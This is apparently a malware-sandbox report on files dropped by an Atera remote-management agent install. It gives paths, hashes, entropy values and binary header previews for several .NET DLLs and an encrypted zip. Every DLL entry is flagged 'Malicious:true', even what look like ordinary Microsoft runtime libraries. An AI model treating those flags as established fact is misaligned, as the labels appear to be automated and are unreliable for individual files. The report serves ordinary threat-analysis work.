                                                                                                                                                                                                                                                                                              SHA-256:8254BC47076020DD5CA444D480819CAAF3C32FD4C9176A36B9C61627200EB56E
                                                                                                                                                                                                                                                                                              SHA-512:3547EEC3DD123CFFBBD5F4B63B92BCDB9B060B88061F6B0322CC3706CF0499C25B5C6F1EED9CB98BF0829128742330AEBCA8F13C833E783437BC0D41DB09AEF8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....$..........." ..0.................. ........... ..............................d|....`.................................W...O.......................P(..........h...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........4...i..............0...........................................~....*..0..........(....,..*..(.....o*......&...*...................0...........(.......(+...-..,..*.*.(....,.r...p......%...%...(,...*..(-...*.(....,.r...p......%...%...%...(,...*...(....*.(....,!r...p......%...%...%...%...(,...*....(/...*..,&(....,..r...pr...p.(,...(0...*..(1...*.*.(....,.r...p......%...%...(,...*...(2...*.(....,.r...p......%...%...%...(,...*....(3...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33360
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3190237273268846
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:uQ4EbR32/LNT07ANLN92D1NltSIEpYi60TI:u/ENGLl07ANLN0pSx76MI
                                                                                                                                                                                                                                                                                              MD5:D36FAF66D58F5314800FC31E9D5A8466
                                                                                                                                                                                                                                                                                              SHA1:2E5A4790F4CE129E6051205EFEC593FD0F8381EC
                                                                                                                                                                                                                                                                                              SHA-256:94FF2234A26B28DCC0A5529B5F4A54764DDCD98812FAA6658165F8BC888DA721
                                                                                                                                                                                                                                                                                              SHA-512:7D664BCA31935A3C1C53AEDA7267BF5771CB36C506D02E613D5DE403BA2BA10538459879599D82A4C0895A91C5A0641AA609E07648F6092B497A08905F4477B5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.!..........." ..0..N...........l... ........... ....................................`..................................l..O....... ............Z..P(..........|k..T............................................ ............... ..H............text....L... ...N.................. ..`.rsrc... ............P..............@..@.reloc...............X..............@..B.................l......H........(...1...........Y..8....j.......................................~....*..0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r...p......%...%...(%...*...(+...*.(....,.r...p......%...%...%...(%...*....(,...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\de\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9728
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.560006548424685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:AiWWNv/jzSENtqcadVl8PandjJUf7ZJSqSi/ufPU1S5rxg0XWr:v1Nvb5adVl8P2djJMZJSGu3z5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:63E9B310597AC25A1CEAA55B6F0CC9F3
                                                                                                                                                                                                                                                                                              SHA1:0C5B170ABA511F479E593727CF7F562523EA7E8C
                                                                                                                                                                                                                                                                                              SHA-256:96B51BB87A1F4072D10B774FFADF81AF93881900571D21FE638E10E3FB0220B8
                                                                                                                                                                                                                                                                                              SHA-512:3BAF3836F8F42DF2D3444409115A3564B0961CD3141CC46E248E6E29A59EC773E511477D8DED4BE05125F2F45E987FD6F94AC5676C318A728B7CA63EB78E9056
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................9... ...@....... ..............................;.....@..................................9..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................9......H........4............... ......P ........................................H.W..Q.2.<.L......H.*...W.!".5....8...}P1......#....Z.N..d.....o...P.....@G...g.g..7.w.!V_..4..7.=.G.".8%..q..G....a...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.43329064965383
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:ycWWNv/jzSEStoC1vxx6hUltfxx+BE00cUnAPq115rxg0XWr:yc1NvbGVxx6hUltfxgE00cLq5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:94136496103CA7B4425EB6D639EEC501
                                                                                                                                                                                                                                                                                              SHA1:AC8F3F4E7C04D4BEEFBA94004A114880662C8387
                                                                                                                                                                                                                                                                                              SHA-256:A3A44472A3944FF0D5C31241BF6DD9B6AE04EAE03581D338B53E3E41EED7141D
                                                                                                                                                                                                                                                                                              SHA-512:04F4614C5BCF97EC643079D50FFA800B2F89A503E02D7DA6FF97AA463993A6964833068063C5A144C7E7D44BEAF082B43EA672F66B4E831EC2CE828666C4965B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................n:... ...@....... ...............................x....@................................. :..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................P:......H.......,5............... ..\...P ........................................^M...=..A'R..\N.....U.{..-.Y+........E.?.......3.....#..9.v..2q..?..L..>s.SI.....}...M..Q.=.w....(<.I...,....>^..E..J..X..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.581775279455886
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:R/WWNv/jzSEYtPpmKJiDjgmlRFI0HYZDKz/VPH1g5rxg0XWr:R/1NvbdKJiDjgmlRi0HYZDMa5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:8C7822BE67F1576F2E11817826ABE40E
                                                                                                                                                                                                                                                                                              SHA1:9B9EDD5FEE4415CB7FB09F0940BEAAFF1C107EB7
                                                                                                                                                                                                                                                                                              SHA-256:C9A7CFE32AB4567D671A84397ABDA29CC92B21CB412CE0F0DF12352C68B7460F
                                                                                                                                                                                                                                                                                              SHA-512:70F76DFFB3FE25F1D3550BEC3C168805AB422C6A0505DDDD21EB2A5B59F24D5F37AEDE0DBEBCF16F821868789E17A87AE61442BE6525ECA0461C0146E4E6B850
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................^;... ...@....... ....................................@..................................;..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B................@;......H........6............... ..?...P ......................................S...8cY)..6. .X.YE...W.....*.......r.~@.]\.D.3.....4I...P.u.....Y2Y.n....)@.xV.#g..V.tI.&.gy8....)U..@k..n...FF..w..6.) R.;..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.368843686720491
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:IiWWNv/jzSE5tyT1TNgr1nJIhZAf/07mPk1q5rxg0XWr:31NvbGTNgr1nJI3+07M75rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:79C01911FD90F929CCBD1D4964D2C17A
                                                                                                                                                                                                                                                                                              SHA1:1878855F9C350B245C3258204A754770CAD776A3
                                                                                                                                                                                                                                                                                              SHA-256:E8F0F7F9E9F2D836AAA341A39D3B395B397BAC0B88F6DDED3F159A6C8D2D74A1
                                                                                                                                                                                                                                                                                              SHA-512:0C820224F516FE888621C09E3ED1870AC4B702AB97B1CE3CE4463445FC96F9D8798C97B6AE6ECFF1175D8D8EE8657052AF0E42D03B55340635CF9F5E65A9D6FA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................9... ...@....... ....................................@..................................9..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................9......H........4............... ......P ........................................^V..d.~.R.t..i....v=.pIE\..#.}-{.u4....fIk.9.A..G....P_.S.u...w...J.AY....,.v.. ...A..."./..%.z+...".e..:.d....t.G...o................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.593201257102684
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:9SWWNv/jzSEYtq2dE1cxy8ON0Qsk96sPE1V5rxg0XWr:9S1NvbaG1cxy8ONHskd85rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:437252DA54AB3171BC7DE366E5494AD8
                                                                                                                                                                                                                                                                                              SHA1:A4FCFD9240B28C836240D4CAA4C9EC8DE38F6E9F
                                                                                                                                                                                                                                                                                              SHA-256:9BFB9826E286B55AA5A580A5C220114063871B1EA8C541DF783A73EF8E72806B
                                                                                                                                                                                                                                                                                              SHA-512:8D56A2EF0DE3B3BF16FE4D931EE6D6A8119E4CD7B3FFA52AC3EF65CEA2A2F4C4E99ED536757546A54CD5A2318A1BA4E70E6425367402CFD06345FEA6EE8442C0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................;... ...@....... ..............................._....@..................................:..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......&..............@..B.................:......H........5............... ......P .......................................4....4...L.."...J...%-..............Drc....4.....n.3Cw .r$y.4......%..5[YupFe....R..!`..#h.I..-3..kH..:~ya..P9....PD.}...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.84740063117937
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:AHwWWNv/jzSEfthb7O9JKggIOrCPPzm394in3fwB/CZPlN1O5rxg0XWr:AQ1NvbH7O9JKgglrCPChnYVC5E5rxg06
                                                                                                                                                                                                                                                                                              MD5:44CC811E193FB220954A0E56AF6F7682
                                                                                                                                                                                                                                                                                              SHA1:B1437F518F3D8E8DEAD506D7E352B69593486244
                                                                                                                                                                                                                                                                                              SHA-256:8CDCF449550DF3F9CACD3A8A41D19D6144BB0FED630825D6118D4077F637BC35
                                                                                                                                                                                                                                                                                              SHA-512:E3FE956494F6179D6A725ECA38FE0E0739A14300DE035093212B0169BED45374E3792EBF7DF916996923777CCB9842C04D9B954D30094D51CE81A892D8F49385
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................~=... ...@....... ....................................@.................................,=..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B................`=......H.......88............... ..e...P .......................................s....E..s....D6..|G....Kc....,..M......8..................}..\.bf..qe.T....w RF..B..y5fW=...N&GE(..[...._.H.....Y.c...ta..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.Messages.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):801048
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.7800450887072108
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:8qirVlWQX3WT56Os1HnhWgN7acWf53p13s5yX01k9z3Agrf8mNVf0nj:8BriQ+5kHRN76HcYR9zPrf8mrf0nj
                                                                                                                                                                                                                                                                                              MD5:7A44C33341844DBE9C6FA526AF88E80A
                                                                                                                                                                                                                                                                                              SHA1:0ACABD100F61A2F8B3C5E68A270599AD54EB8A39
                                                                                                                                                                                                                                                                                              SHA-256:68F73AB17FB7F4AFF3D35EF6DB0E9D5B0FA0151111CB3D03992E23BC29D6C40A
                                                                                                                                                                                                                                                                                              SHA-512:B81D63B345C193C6DEF17372311447D305AE167B2C4D1C2FDB0344D1E1EF5FF4F9D52599FFD862B2480825B308178737DF7E5E48C31E712339F009E92B6EAF57
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|'............" ..0.............&)... ...@....... ....................................`..................................(..O....@..l................)...`.......'..T............................................ ............... ..H............text...,.... ...................... ..`.rsrc...l....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................H'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......`...#Blob......................3..............................................-.....-...0.....M.................R.................h.....7...........[.....x...........D...................................).....1.....9.....I... .Q.....Y.....a.....i.....q.....y...............................#.....#.....+.....3.X...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):171784
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.142996498151589
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:CscEziGN+eKDIJDkqFzX3uW2tWWka+EInVL8QOuebyh52:nViG3dJDN9+xIWkaGilbeU
                                                                                                                                                                                                                                                                                              MD5:D746020927C079537618C3741FC13985
                                                                                                                                                                                                                                                                                              SHA1:1EF0C97A31CF8CEBAD508DCDD367255D70DCA751
                                                                                                                                                                                                                                                                                              SHA-256:5D65536889CACB7D87892BB9C71ACF01CF7FF0199273D774F8408B2466EA9DC4
                                                                                                                                                                                                                                                                                              SHA-512:5F22F3B5751A5BD82EC595CF0CDD552DE5047FFD535F84CF777456215622B8251AB838D9723489A065310913236FB7EAD430FAD2B6F4641AB22ECBF16DF94F70
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..........." ..0..l.............. ........... .............................../....`.....................................O....................v...)..............T............................................ ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B........................H........................r..0.............................................j ....n_ ....n3..*. ...._ ....`*...0.......................(3..............(4....(5...........(5............(6.....(7.........(&.....(8......................(9.....(:.......,...(;.....(<.....(=....*.(..../.0_........".Bd..........d~.......0..s.....................................(4......(4.....(6......(6.....(7.........('.....(8..............(<.....(<.....(=....*.........A\.......0......................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net8.0\System.ServiceProcess.ServiceController.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):87728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.028686758952157
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:G7PttVEhUdebIzkSmM7VuFvTb6wbN0pKxwwzoX:GlFeUISmM7VgCwbNKKSwW
                                                                                                                                                                                                                                                                                              MD5:634779CAF0A33D40C67D257ECB439827
                                                                                                                                                                                                                                                                                              SHA1:E18BF7CB362FF6AEEB714B2BB510E1B946A41D0F
                                                                                                                                                                                                                                                                                              SHA-256:087FFD8EA723D88AB278D68A1E20B1CB513FE3C2A53356308E58E3B91601A283
                                                                                                                                                                                                                                                                                              SHA-512:A687A4D72CDDD520EF6C4C9F47DC9164DE72DD1367330EF2D75152EB9F9D1ADA3B5EADF8DFB512C7EDFC7D816324B50D7C30671DF6455C6A66D8C833269AD178
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C]>..........." ..0.."...........A... ...`....... ..............................*.....`..................................A..O....`.. ................(..........t@..T............................................ ............... ..H............text....!... ...".................. ..`.rsrc... ....`.......$..............@..@.reloc...............,..............@..B.................A......H........R..................8....?......................................6.~-....(....*R.~-....(......(/...*z.(0...~-......(0....s1.....*.*2.{2...(....*.~m...*...0..........(....,..*..(.....o3......&...*..............'....0...........(.......(4...-..,..*.*.(....,.r...p......%...%...(5...*..(6...*.(....,.r...p......%...%...%...(5...*...(7...*.(....,!r...p......%...%...%...%...(5...*....(8...*..,&(....,..r...pr...p.(5...(9...*..(:...*.*.(....,.r...p......%...%...(5...*...(;...*.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9728
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.709151479489131
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:0uWWNv/jzSEhtiBbSEmfO2mdqeCtzEc6yCPVo1L5rxg0XWr:J1NvbcbSEm22mdqet+ws5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:90289DA899746E328816734D723C93A0
                                                                                                                                                                                                                                                                                              SHA1:6AF8E30872729E89FE0A7C01D99DACF4AE6726CF
                                                                                                                                                                                                                                                                                              SHA-256:2B3853CEBEA222ABB31C2B1E3D6CD19A2F6621ABB56954162751A2B592680676
                                                                                                                                                                                                                                                                                              SHA-512:ABB6FE5216B412CD85E139D69657A40BEEBA00F2DD0DF1795AAD8CF27C13D9CE0EB2DCF3904CA445678D689CE56FA2C169ED7B40490181EA6B770B1A634A6D4B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................8... ...@....... ....................................@..................................8..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................8......H........3............... ......P ..............................................~.Xi.....05.]..sE04.hg.'...../.K'l..a..m..Z....q..m..4&....h....le..|.Z...../.....!*............<.XV$!./..})................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9728
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.7267524338984295
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:T2WWNv/jzSEhtimYtEq40uI7Sr2fqmxkNeo7R7L7c7xM757odHK9nPo21f5rxg06:a1NvbOtEq40uYSatEdHwWloA9Pb5rxgJ
                                                                                                                                                                                                                                                                                              MD5:2356F25971B72EDBB3303AEA1BEFB9A1
                                                                                                                                                                                                                                                                                              SHA1:60780C3E4F36829A0038BF56CD929148A0A0523C
                                                                                                                                                                                                                                                                                              SHA-256:99C3F55737EBC53BA4EAA92FAAE23EC8AAB9149826E5D821D6BC976706BED237
                                                                                                                                                                                                                                                                                              SHA-512:3252FE8D4A04F4EF79DB76DEB446FBA236E0B281E0B1B35488198D8A5D8EF0F4890ED68DB0E93CA17CE3783B6A6A4D71EF5F8979F917E05D4DDAC638DF082A60
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................8... ...@....... ....................................@..................................8..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................8......H........3............... ......P ........................................u..q.:7i...g.'=......a.2j.V.:}......o.....F5.Sv....v.|...(.':KP.d._..D..s].Nx<..e........k.......P.0...h")g..N.>...@...).6...............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....G.......PADPADP..7...7....\.....`.Q......!...........:oH..S....c...........L.}..>.. 2...3...5......:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1152141
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9996934105504405
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Y0MtJOalt7fQwfM+tshGvx5LBhqAc9sDQPfs8+5iaSpFiz:65Lm++hGZ5LnZMO8f+5Aiz
                                                                                                                                                                                                                                                                                              MD5:9A9B1FD85B5F1DCD568A521399A0D057
                                                                                                                                                                                                                                                                                              SHA1:34ED149B290A3A94260D889BA50CB286F1795FA6
                                                                                                                                                                                                                                                                                              SHA-256:88D5A5A4A1B56963D509989B9BE1A914AFE3E9EE25C2D786328DF85DA4A7820D
                                                                                                                                                                                                                                                                                              SHA-512:7C1259DDDFF406FDAADB236BF4C7DFB734C9DA34FD7BAD9994839772E298EBF3F19F02EB0655E773BA82702AA9175337BA4416C561DC2CB604D08E271CC74776
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
